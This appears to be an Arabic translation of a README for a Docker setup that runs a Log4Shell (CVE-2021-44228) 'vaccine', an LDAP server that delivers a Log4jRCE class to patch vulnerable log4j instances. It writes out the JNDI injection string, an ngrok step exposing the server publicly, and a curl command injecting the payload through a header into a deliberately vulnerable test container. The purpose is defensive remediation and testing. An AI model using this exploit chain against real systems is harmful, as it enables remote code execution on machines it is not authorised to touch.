
حل docker compose لتشغيل بيئة تطعيم للثغرة log4j2 CVE-2021-44228
طريقة محوسبة (في حاوية) لتشغيل لقاح log4j المقدم من Cyberreason
انسخ هذا المستودع:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
قم بتحرير ملف containers.env لتعيين عنوان IP أو DNS خاص أو عام دقيق يمكن لهدفك الوصول إليه. الإدخال الافتراضي على الأرجح لن يعمل معك!
قم ببناء وتشغيل الحاويات:
docker-compose -f docker-compose.yml -p vaccine up
لديك الآن خادم ldap يستمع ويقدم فئة Log4jRCE لتطعيم نسخة log4j ضعيفة.
يمكنك تعريض هذا للإنترنت (إذا أردت) باستخدام ngrok.
ngrok tcp 1389
يمكنك إرسال نسخة ضعيفة من log4j إلى هذا باستخدام سلسلة إدخال jndi سيئة السمعة:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
هناك نسخة ضعيفة عن قصد من log4j في حاوية متاحة على:
يمكنك اتباع تعليماتهم لبدء تشغيلها واستخدامها للاختبار:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
وتفعيل التطعيم عبر:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'